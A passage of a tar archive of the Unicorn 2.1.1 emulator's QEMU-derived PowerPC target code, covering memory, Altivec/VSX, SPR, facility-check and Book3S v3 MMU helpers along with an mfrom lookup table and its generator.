(likely(host)) { /* Fast path -- the entire operation is in RAM at host. */ for (; nb > 3; nb -= 4) { stl_be_p(host, env->gpr[reg]); reg = (reg + 1) % 32; host += 4; } val = env->gpr[reg]; switch (nb) { case 1: stb_p(host, val >> 24); break; case 2: stw_be_p(host, val >> 16); break; case 3: stw_be_p(host, val >> 16); stb_p(host + 2, val >> 8); break; } } else { for (; nb > 3; nb -= 4) { cpu_stl_mmuidx_ra(env, addr, env->gpr[reg], mmu_idx, raddr); reg = (reg + 1) % 32; addr = addr_add(env, addr, 4); } val = env->gpr[reg]; switch (nb) { case 1: cpu_stb_mmuidx_ra(env, addr, val >> 24, mmu_idx, raddr); break; case 2: cpu_stw_mmuidx_ra(env, addr, val >> 16, mmu_idx, raddr); break; case 3: cpu_stw_mmuidx_ra(env, addr, val >> 16, mmu_idx, raddr); addr = addr_add(env, addr, 2); cpu_stb_mmuidx_ra(env, addr, val >> 8, mmu_idx, raddr); break; } } } static void dcbz_common(CPUPPCState *env, target_ulong addr, uint32_t opcode, bool epid, uintptr_t retaddr) { target_ulong mask, dcbz_size = env->dcache_line_size; uint32_t i; void *haddr; int mmu_idx = epid ? PPC_TLB_EPID_STORE : env->dmmu_idx; #if defined(TARGET_PPC64) /* Check for dcbz vs dcbzl on 970 */ if (env->excp_model == POWERPC_EXCP_970 && !(opcode & 0x00200000) && ((env->spr[SPR_970_HID5] >> 7) & 0x3) == 1) { dcbz_size = 32; } #endif /* Align address */ mask = ~(dcbz_size - 1); addr &= mask; /* Check reservation */ if ((env->reserve_addr & mask) == addr) { #ifdef _MSC_VER env->reserve_addr = (target_ulong)(0ULL - 1ULL); #else env->reserve_addr = (target_ulong)-1ULL; #endif } /* Try fast path translate */ haddr = probe_write(env, addr, dcbz_size, mmu_idx, retaddr); if (haddr) { memset(haddr, 0, dcbz_size); } else { /* Slow path */ for (i = 0; i < dcbz_size; i += 8) { cpu_stq_mmuidx_ra(env, addr + i, 0, mmu_idx, retaddr); } } } void helper_dcbz(CPUPPCState *env, target_ulong addr, uint32_t opcode) { dcbz_common(env, addr, opcode, false, GETPC()); } void helper_dcbzep(CPUPPCState *env, target_ulong addr, uint32_t opcode) { dcbz_common(env, addr, opcode, true, GETPC()); } void helper_icbi(CPUPPCState *env, target_ulong addr) { addr &= ~(env->dcache_line_size - 1); /* * Invalidate one cache line : * PowerPC specification says this is to be treated like a load * (not a fetch) by the MMU. To be sure it will be so, * do the load "by hand". */ cpu_ldl_data_ra(env, addr, GETPC()); } void helper_icbiep(CPUPPCState *env, target_ulong addr) { /* See comments above */ addr &= ~(env->dcache_line_size - 1); cpu_ldl_mmuidx_ra(env, addr, PPC_TLB_EPID_LOAD, GETPC()); } /* XXX: to be tested */ target_ulong helper_lscbx(CPUPPCState *env, target_ulong addr, uint32_t reg, uint32_t ra, uint32_t rb) { int i, c, d; d = 24; for (i = 0; i < xer_bc; i++) { c = cpu_ldub_data_ra(env, addr, GETPC()); addr = addr_add(env, addr, 1); /* ra (if not 0) and rb are never modified */ if (likely(reg != rb && (ra == 0 || reg != ra))) { env->gpr[reg] = (env->gpr[reg] & ~(0xFF << d)) | (c << d); } if (unlikely(c == xer_cmp)) { break; } if (likely(d != 0)) { d -= 8; } else { d = 24; reg++; reg = reg & 0x1F; } } return i; } #ifdef TARGET_PPC64 uint64_t helper_lq_le_parallel(CPUPPCState *env, target_ulong addr, uint32_t opidx) { Int128 ret; /* We will have raised EXCP_ATOMIC from the translator. */ assert(HAVE_ATOMIC128); ret = helper_atomic_ldo_le_mmu(env, addr, opidx, GETPC()); env->retxh = int128_gethi(ret); return int128_getlo(ret); } uint64_t helper_lq_be_parallel(CPUPPCState *env, target_ulong addr, uint32_t opidx) { Int128 ret; /* We will have raised EXCP_ATOMIC from the translator. */ assert(HAVE_ATOMIC128); ret = helper_atomic_ldo_be_mmu(env, addr, opidx, GETPC()); env->retxh = int128_gethi(ret); return int128_getlo(ret); } void helper_stq_le_parallel(CPUPPCState *env, target_ulong addr, uint64_t lo, uint64_t hi, uint32_t opidx) { Int128 val; /* We will have raised EXCP_ATOMIC from the translator. */ assert(HAVE_ATOMIC128); val = int128_make128(lo, hi); helper_atomic_sto_le_mmu(env, addr, val, opidx, GETPC()); } void helper_stq_be_parallel(CPUPPCState *env, target_ulong addr, uint64_t lo, uint64_t hi, uint32_t opidx) { Int128 val; /* We will have raised EXCP_ATOMIC from the translator. */ assert(HAVE_ATOMIC128); val = int128_make128(lo, hi); helper_atomic_sto_be_mmu(env, addr, val, opidx, GETPC()); } uint32_t helper_stqcx_le_parallel(CPUPPCState *env, target_ulong addr, uint64_t new_lo, uint64_t new_hi, uint32_t opidx) { bool success = false; /* We will have raised EXCP_ATOMIC from the translator. */ assert(HAVE_CMPXCHG128); if (likely(addr == env->reserve_addr)) { Int128 oldv, cmpv, newv; cmpv = int128_make128(env->reserve_val2, env->reserve_val); newv = int128_make128(new_lo, new_hi); oldv = helper_atomic_cmpxchgo_le_mmu(env, addr, cmpv, newv, opidx, GETPC()); success = int128_eq(oldv, cmpv); } env->reserve_addr = -1; return env->so + success * CRF_EQ_BIT; } uint32_t helper_stqcx_be_parallel(CPUPPCState *env, target_ulong addr, uint64_t new_lo, uint64_t new_hi, uint32_t opidx) { bool success = false; /* We will have raised EXCP_ATOMIC from the translator. */ assert(HAVE_CMPXCHG128); if (likely(addr == env->reserve_addr)) { Int128 oldv, cmpv, newv; cmpv = int128_make128(env->reserve_val2, env->reserve_val); newv = int128_make128(new_lo, new_hi); oldv = helper_atomic_cmpxchgo_be_mmu(env, addr, cmpv, newv, opidx, GETPC()); success = int128_eq(oldv, cmpv); } env->reserve_addr = -1; return env->so + success * CRF_EQ_BIT; } #endif /*****************************************************************************/ /* Altivec extension helpers */ #if defined(HOST_WORDS_BIGENDIAN) #define HI_IDX 0 #define LO_IDX 1 #else #define HI_IDX 1 #define LO_IDX 0 #endif /* * We use msr_le to determine index ordering in a vector. However, * byteswapping is not simply controlled by msr_le. We also need to * take into account endianness of the target. This is done for the * little-endian PPC64 user-mode target. */ #define LVE(name, access, swap, element) \ void helper_##name(CPUPPCState *env, ppc_avr_t *r, \ target_ulong addr) \ { \ size_t n_elems = ARRAY_SIZE(r->element); \ int adjust = HI_IDX * (n_elems - 1); \ int sh = sizeof(r->element[0]) >> 1; \ int index = (addr & 0xf) >> sh; \ if (msr_le) { \ index = n_elems - index - 1; \ } \ \ if (needs_byteswap(env)) { \ r->element[LO_IDX ? index : (adjust - index)] = \ swap(access(env, addr, GETPC())); \ } else { \ r->element[LO_IDX ? index : (adjust - index)] = \ access(env, addr, GETPC()); \ } \ } #define I(x) (x) LVE(lvebx, cpu_ldub_data_ra, I, u8) LVE(lvehx, cpu_lduw_data_ra, bswap16, u16) LVE(lvewx, cpu_ldl_data_ra, bswap32, u32) #undef I #undef LVE #define STVE(name, access, swap, element) \ void helper_##name(CPUPPCState *env, ppc_avr_t *r, \ target_ulong addr) \ { \ size_t n_elems = ARRAY_SIZE(r->element); \ int adjust = HI_IDX * (n_elems - 1); \ int sh = sizeof(r->element[0]) >> 1; \ int index = (addr & 0xf) >> sh; \ if (msr_le) { \ index = n_elems - index - 1; \ } \ \ if (needs_byteswap(env)) { \ access(env, addr, swap(r->element[LO_IDX ? index : \ (adjust - index)]), \ GETPC()); \ } else { \ access(env, addr, r->element[LO_IDX ? index : \ (adjust - index)], GETPC()); \ } \ } #define I(x) (x) STVE(stvebx, cpu_stb_data_ra, I, u8) STVE(stvehx, cpu_stw_data_ra, bswap16, u16) STVE(stvewx, cpu_stl_data_ra, bswap32, u32) #undef I #undef LVE #ifdef TARGET_PPC64 #define GET_NB(rb) ((rb >> 56) & 0xFF) #define VSX_LXVL(name, lj) \ void helper_##name(CPUPPCState *env, target_ulong addr, \ ppc_vsr_t *xt, target_ulong rb) \ { \ ppc_vsr_t t; \ uint64_t nb = GET_NB(rb); \ int i; \ \ t.s128 = int128_zero(); \ if (nb) { \ nb = (nb >= 16) ? 16 : nb; \ if (msr_le && !lj) { \ for (i = 16; i > 16 - nb; i--) { \ t.VsrB(i - 1) = cpu_ldub_data_ra(env, addr, GETPC()); \ addr = addr_add(env, addr, 1); \ } \ } else { \ for (i = 0; i < nb; i++) { \ t.VsrB(i) = cpu_ldub_data_ra(env, addr, GETPC()); \ addr = addr_add(env, addr, 1); \ } \ } \ } \ *xt = t; \ } VSX_LXVL(lxvl, 0) VSX_LXVL(lxvll, 1) #undef VSX_LXVL #define VSX_STXVL(name, lj) \ void helper_##name(CPUPPCState *env, target_ulong addr, \ ppc_vsr_t *xt, target_ulong rb) \ { \ target_ulong nb = GET_NB(rb); \ int i; \ \ if (!nb) { \ return; \ } \ \ nb = (nb >= 16) ? 16 : nb; \ if (msr_le && !lj) { \ for (i = 16; i > 16 - nb; i--) { \ cpu_stb_data_ra(env, addr, xt->VsrB(i - 1), GETPC()); \ addr = addr_add(env, addr, 1); \ } \ } else { \ for (i = 0; i < nb; i++) { \ cpu_stb_data_ra(env, addr, xt->VsrB(i), GETPC()); \ addr = addr_add(env, addr, 1); \ } \ } \ } VSX_STXVL(stxvl, 0) VSX_STXVL(stxvll, 1) #undef VSX_STXVL #undef GET_NB #endif /* TARGET_PPC64 */ #undef HI_IDX #undef LO_IDX void helper_tbegin(CPUPPCState *env) { /* * As a degenerate implementation, always fail tbegin. The reason * given is "Nesting overflow". The "persistent" bit is set, * providing a hint to the error handler to not retry. The TFIAR * captures the address of the failure, which is this tbegin * instruction. Instruction execution will continue with the next * instruction in memory, which is precisely what we want. */ env->spr[SPR_TEXASR] = (1ULL << TEXASR_FAILURE_PERSISTENT) | (1ULL << TEXASR_NESTING_OVERFLOW) | (msr_hv << TEXASR_PRIVILEGE_HV) | (msr_pr << TEXASR_PRIVILEGE_PR) | (1ULL << TEXASR_FAILURE_SUMMARY) | (1ULL << TEXASR_TFIAR_EXACT); env->spr[SPR_TFIAR] = env->nip | (msr_hv << 1) | msr_pr; env->spr[SPR_TFHAR] = env->nip + 4; env->crf[0] = 0xB; /* 0b1010 = transaction failure */ } ���������������������������unicorn-2.1.1/qemu/target/ppc/mfrom_table.inc.c�����������������������������������������������������0000664�0000000�0000000�00000006443�14675241067�0021435�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������static const uint8_t mfrom_ROM_table[602] = { 77, 77, 76, 76, 75, 75, 74, 74, 73, 73, 72, 72, 71, 71, 70, 70, 69, 69, 68, 68, 68, 67, 67, 66, 66, 65, 65, 64, 64, 64, 63, 63, 62, 62, 61, 61, 61, 60, 60, 59, 59, 58, 58, 58, 57, 57, 56, 56, 56, 55, 55, 54, 54, 54, 53, 53, 53, 52, 52, 51, 51, 51, 50, 50, 50, 49, 49, 49, 48, 48, 47, 47, 47, 46, 46, 46, 45, 45, 45, 44, 44, 44, 43, 43, 43, 42, 42, 42, 42, 41, 41, 41, 40, 40, 40, 39, 39, 39, 39, 38, 38, 38, 37, 37, 37, 37, 36, 36, 36, 35, 35, 35, 35, 34, 34, 34, 34, 33, 33, 33, 33, 32, 32, 32, 32, 31, 31, 31, 31, 30, 30, 30, 30, 29, 29, 29, 29, 28, 28, 28, 28, 28, 27, 27, 27, 27, 26, 26, 26, 26, 26, 25, 25, 25, 25, 25, 24, 24, 24, 24, 24, 23, 23, 23, 23, 23, 23, 22, 22, 22, 22, 22, 21, 21, 21, 21, 21, 21, 20, 20, 20, 20, 20, 20, 19, 19, 19, 19, 19, 19, 19, 18, 18, 18, 18, 18, 18, 17, 17, 17, 17, 17, 17, 17, 16, 16, 16, 16, 16, 16, 16, 16, 15, 15, 15, 15, 15, 15, 15, 15, 14, 14, 14, 14, 14, 14, 14, 14, 13, 13, 13, 13, 13, 13, 13, 13, 13, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, }; �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mfrom_table_gen.c�����������������������������������������������������0000664�0000000�0000000�00000001224�14675241067�0021506�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#define _GNU_SOURCE #include "qemu/osdep.h" #include <math.h> int main(void) { double d; uint8_t n; int i; printf("static const uint8_t mfrom_ROM_table[602] =\n{\n "); for (i = 0; i < 602; i++) { /* * Extremely decomposed: * -T0 / 256 * T0 = 256 * log10(10 + 1.0) + 0.5 */ d = -i; d /= 256.0; d = exp10(d); d += 1.0; d = log10(d); d *= 256; d += 0.5; n = d; printf("%3d, ", n); if ((i & 7) == 7) { printf("\n "); } } printf("\n};\n"); return 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/misc_helper.c���������������������������������������������������������0000664�0000000�0000000�00000021050�14675241067�0020657�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Miscellaneous PowerPC emulation helpers for QEMU. * * Copyright (c) 2003-2007 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "helper_regs.h" /*****************************************************************************/ /* SPR accesses */ void helper_load_dump_spr(CPUPPCState *env, uint32_t sprn) { #if 0 qemu_log("Read SPR %d %03x => " TARGET_FMT_lx "\n", sprn, sprn, env->spr[sprn]); #endif } void helper_store_dump_spr(CPUPPCState *env, uint32_t sprn) { #if 0 qemu_log("Write SPR %d %03x <= " TARGET_FMT_lx "\n", sprn, sprn, env->spr[sprn]); #endif } #ifdef TARGET_PPC64 static void raise_hv_fu_exception(CPUPPCState *env, uint32_t bit, const char *caller, uint32_t cause, uintptr_t raddr) { qemu_log_mask(CPU_LOG_INT, "HV Facility %d is unavailable (%s)\n", bit, caller); env->spr[SPR_HFSCR] &= ~((target_ulong)FSCR_IC_MASK << FSCR_IC_POS); raise_exception_err_ra(env, POWERPC_EXCP_HV_FU, cause, raddr); } static void raise_fu_exception(CPUPPCState *env, uint32_t bit, uint32_t sprn, uint32_t cause, uintptr_t raddr) { // qemu_log("Facility SPR %d is unavailable (SPR FSCR:%d)\n", sprn, bit); env->spr[SPR_FSCR] &= ~((target_ulong)FSCR_IC_MASK << FSCR_IC_POS); cause &= FSCR_IC_MASK; env->spr[SPR_FSCR] |= (target_ulong)cause << FSCR_IC_POS; raise_exception_err_ra(env, POWERPC_EXCP_FU, 0, raddr); } #endif void helper_hfscr_facility_check(CPUPPCState *env, uint32_t bit, const char *caller, uint32_t cause) { #ifdef TARGET_PPC64 if ((env->msr_mask & MSR_HVB) && !msr_hv && !(env->spr[SPR_HFSCR] & (1ULL << bit))) { raise_hv_fu_exception(env, bit, caller, cause, GETPC()); } #endif } void helper_fscr_facility_check(CPUPPCState *env, uint32_t bit, uint32_t sprn, uint32_t cause) { #ifdef TARGET_PPC64 if (env->spr[SPR_FSCR] & (1ULL << bit)) { /* Facility is enabled, continue */ return; } raise_fu_exception(env, bit, sprn, cause, GETPC()); #endif } void helper_msr_facility_check(CPUPPCState *env, uint32_t bit, uint32_t sprn, uint32_t cause) { #ifdef TARGET_PPC64 if (env->msr & (1ULL << bit)) { /* Facility is enabled, continue */ return; } raise_fu_exception(env, bit, sprn, cause, GETPC()); #endif } void helper_store_sdr1(CPUPPCState *env, target_ulong val) { if (env->spr[SPR_SDR1] != val) { ppc_store_sdr1(env, val); tlb_flush(env_cpu(env)); } } #if defined(TARGET_PPC64) void helper_store_ptcr(CPUPPCState *env, target_ulong val) { if (env->spr[SPR_PTCR] != val) { ppc_store_ptcr(env, val); tlb_flush(env_cpu(env)); } } void helper_store_pcr(CPUPPCState *env, target_ulong value) { PowerPCCPU *cpu = env_archcpu(env); PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); env->spr[SPR_PCR] = value & pcc->pcr_mask; } /* * DPDES register is shared. Each bit reflects the state of the * doorbell interrupt of a thread of the same core. */ target_ulong helper_load_dpdes(CPUPPCState *env) { target_ulong dpdes = 0; helper_hfscr_facility_check(env, HFSCR_MSGP, "load DPDES", HFSCR_IC_MSGP); /* TODO: TCG supports only one thread */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_DOORBELL)) { dpdes = 1; } return dpdes; } void helper_store_dpdes(CPUPPCState *env, target_ulong val) { PowerPCCPU *cpu = env_archcpu(env); CPUState *cs = CPU(cpu); helper_hfscr_facility_check(env, HFSCR_MSGP, "store DPDES", HFSCR_IC_MSGP); /* TODO: TCG supports only one thread */ if (val & ~0x1) { qemu_log_mask(LOG_GUEST_ERROR, "Invalid DPDES register value " TARGET_FMT_lx"\n", val); return; } if (val & 0x1) { env->pending_interrupts |= 1 << PPC_INTERRUPT_DOORBELL; cpu_interrupt(cs, CPU_INTERRUPT_HARD); } else { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_DOORBELL); } } #endif /* defined(TARGET_PPC64) */ void helper_store_pidr(CPUPPCState *env, target_ulong val) { env->spr[SPR_BOOKS_PID] = val; tlb_flush(env_cpu(env)); } void helper_store_lpidr(CPUPPCState *env, target_ulong val) { env->spr[SPR_LPIDR] = val; /* * We need to flush the TLB on LPID changes as we only tag HV vs * guest in TCG TLB. Also the quadrants means the HV will * potentially access and cache entries for the current LPID as * well. */ tlb_flush(env_cpu(env)); } void helper_store_hid0_601(CPUPPCState *env, target_ulong val) { target_ulong hid0; hid0 = env->spr[SPR_HID0]; if ((val ^ hid0) & 0x00000008) { /* Change current endianness */ env->hflags &= ~(1 << MSR_LE); env->hflags_nmsr &= ~(1 << MSR_LE); env->hflags_nmsr |= (1 << MSR_LE) & (((val >> 3) & 1) << MSR_LE); env->hflags |= env->hflags_nmsr; // qemu_log("%s: set endianness to %c => " TARGET_FMT_lx "\n", __func__, // val & 0x8 ? 'l' : 'b', env->hflags); } env->spr[SPR_HID0] = (uint32_t)val; } void helper_store_403_pbr(CPUPPCState *env, uint32_t num, target_ulong value) { if (likely(env->pb[num] != value)) { env->pb[num] = value; /* Should be optimized */ tlb_flush(env_cpu(env)); } } void helper_store_40x_dbcr0(CPUPPCState *env, target_ulong val) { store_40x_dbcr0(env, val); } void helper_store_40x_sler(CPUPPCState *env, target_ulong val) { store_40x_sler(env, val); } /*****************************************************************************/ /* PowerPC 601 specific instructions (POWER bridge) */ target_ulong helper_clcs(CPUPPCState *env, uint32_t arg) { switch (arg) { case 0x0CUL: /* Instruction cache line size */ return env->icache_line_size; break; case 0x0DUL: /* Data cache line size */ return env->dcache_line_size; break; case 0x0EUL: /* Minimum cache line size */ return (env->icache_line_size < env->dcache_line_size) ? env->icache_line_size : env->dcache_line_size; break; case 0x0FUL: /* Maximum cache line size */ return (env->icache_line_size > env->dcache_line_size) ? env->icache_line_size : env->dcache_line_size; break; default: /* Undefined */ return 0; break; } } /*****************************************************************************/ /* Special registers manipulation */ /* GDBstub can read and write MSR... */ void ppc_store_msr(CPUPPCState *env, target_ulong value) { hreg_store_msr(env, value, 0); } /* * This code is lifted from MacOnLinux. It is called whenever THRM1,2 * or 3 is read an fixes up the values in such a way that will make * MacOS not hang. These registers exist on some 75x and 74xx * processors. */ void helper_fixup_thrm(CPUPPCState *env) { target_ulong v, t; int i; #define THRM1_TIN (1 << 31) #define THRM1_TIV (1 << 30) #define THRM1_THRES(x) (((x) & 0x7f) << 23) #define THRM1_TID (1 << 2) #define THRM1_TIE (1 << 1) #define THRM1_V (1 << 0) #define THRM3_E (1 << 0) if (!(env->spr[SPR_THRM3] & THRM3_E)) { return; } /* Note: Thermal interrupts are unimplemented */ for (i = SPR_THRM1; i <= SPR_THRM2; i++) { v = env->spr[i]; if (!(v & THRM1_V)) { continue; } v |= THRM1_TIV; v &= ~THRM1_TIN; t = v & THRM1_THRES(127); if ((v & THRM1_TID) && t < THRM1_THRES(24)) { v |= THRM1_TIN; } if (!(v & THRM1_TID) && t > THRM1_THRES(24)) { v |= THRM1_TIN; } env->spr[i] = v; } } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu-book3s-v3.c�������������������������������������������������������0000664�0000000�0000000�00000004307�14675241067�0020715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC ISAV3 BookS emulation generic mmu helpers for qemu. * * Copyright (c) 2017 Suraj Jitindar Singh, IBM Corporation * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "mmu-hash64.h" #include "mmu-book3s-v3.h" #include "mmu-radix64.h" int ppc64_v3_handle_mmu_fault(PowerPCCPU *cpu, vaddr eaddr, int rwx, int mmu_idx) { if (ppc64_v3_radix(cpu)) { /* Guest uses radix */ return ppc_radix64_handle_mmu_fault(cpu, eaddr, rwx, mmu_idx); } else { /* Guest uses hash */ return ppc_hash64_handle_mmu_fault(cpu, eaddr, rwx, mmu_idx); } } hwaddr ppc64_v3_get_phys_page_debug(PowerPCCPU *cpu, vaddr eaddr) { if (ppc64_v3_radix(cpu)) { return ppc_radix64_get_phys_page_debug(cpu, eaddr); } else { return ppc_hash64_get_phys_page_debug(cpu, eaddr); } } bool ppc64_v3_get_pate(PowerPCCPU *cpu, target_ulong lpid, ppc_v3_pate_t *entry) { uint64_t patb = cpu->env.spr[SPR_PTCR] & PTCR_PATB; uint64_t pats = cpu->env.spr[SPR_PTCR] & PTCR_PATS; /* Calculate number of entries */ pats = 1ull << (pats + 12 - 4); if (pats <= lpid) { return false; } /* Grab entry */ patb += 16 * lpid; #ifdef UNICORN_ARCH_POSTFIX entry->dw0 = glue(ldq_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, patb); entry->dw1 = glue(ldq_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, patb + 8); #else entry->dw0 = ldq_phys(cpu->env.uc, CPU(cpu)->as, patb); entry->dw1 = ldq_phys(cpu->env.uc, CPU(cpu)->as, patb + 8); #endif return true; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu-book3s-v3.h�������������������������������������������������������0000664�0000000�0000000�00000006424�14675241067�0020724�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC ISAV3 BookS emulation generic mmu definitions for qemu. * * Copyright (c) 2017 Suraj Jitindar Singh, IBM Corporation * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef PPC_MMU_BOOK3S_V3_H #define PPC_MMU_BOOK3S_V3_H #include "mmu-hash64.h" /* * Partition table definitions */ #define PTCR_PATB 0x0FFFFFFFFFFFF000ULL /* Partition Table Base */ #define PTCR_PATS 0x000000000000001FULL /* Partition Table Size */ /* Partition Table Entry Fields */ #define PATE0_HR 0x8000000000000000 /* * WARNING: This field doesn't actually exist in the final version of * the architecture and is unused by hardware. However, qemu uses it * as an indication of a radix guest in the pseudo-PATB entry that it * maintains for SPAPR guests and in the migration stream, so we need * to keep it around */ #define PATE1_GR 0x8000000000000000 /* Process Table Entry */ struct prtb_entry { uint64_t prtbe0, prtbe1; }; #ifdef TARGET_PPC64 static inline bool ppc64_use_proc_tbl(PowerPCCPU *cpu) { return !!(cpu->env.spr[SPR_LPCR] & LPCR_UPRT); } bool ppc64_v3_get_pate(PowerPCCPU *cpu, target_ulong lpid, ppc_v3_pate_t *entry); /* * The LPCR:HR bit is a shortcut that avoids having to * dig out the partition table in the fast path. This is * also how the HW uses it. */ static inline bool ppc64_v3_radix(PowerPCCPU *cpu) { return !!(cpu->env.spr[SPR_LPCR] & LPCR_HR); } hwaddr ppc64_v3_get_phys_page_debug(PowerPCCPU *cpu, vaddr eaddr); int ppc64_v3_handle_mmu_fault(PowerPCCPU *cpu, vaddr eaddr, int rwx, int mmu_idx); static inline hwaddr ppc_hash64_hpt_base(PowerPCCPU *cpu) { uint64_t base; #if 0 if (cpu->vhyp) { return 0; } #endif if (cpu->env.mmu_model == POWERPC_MMU_3_00) { ppc_v3_pate_t pate; if (!ppc64_v3_get_pate(cpu, cpu->env.spr[SPR_LPIDR], &pate)) { return 0; } base = pate.dw0; } else { base = cpu->env.spr[SPR_SDR1]; } return base & SDR_64_HTABORG; } static inline hwaddr ppc_hash64_hpt_mask(PowerPCCPU *cpu) { uint64_t base; #if 0 if (cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); return vhc->hpt_mask(cpu->vhyp); } #endif if (cpu->env.mmu_model == POWERPC_MMU_3_00) { ppc_v3_pate_t pate; if (!ppc64_v3_get_pate(cpu, cpu->env.spr[SPR_LPIDR], &pate)) { return 0; } base = pate.dw0; } else { base = cpu->env.spr[SPR_SDR1]; } return (1ULL << ((base & SDR_64_HTABSIZE) + 18 - 7)) - 1; } #endif /* TARGET_PPC64 */ #endif /* PPC_MMU_BOOK3S_V3_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu-hash32.c����������������������������������������������������������0000664�0000000�0000000�00000042717�14675241067�0020266�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC MMU, TLB and BAT emulation helpers for QEMU. * * Copyright (c) 2003-2007 Jocelyn Mayer * Copyright (c) 2013 David Gibson, IBM Corporation * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" 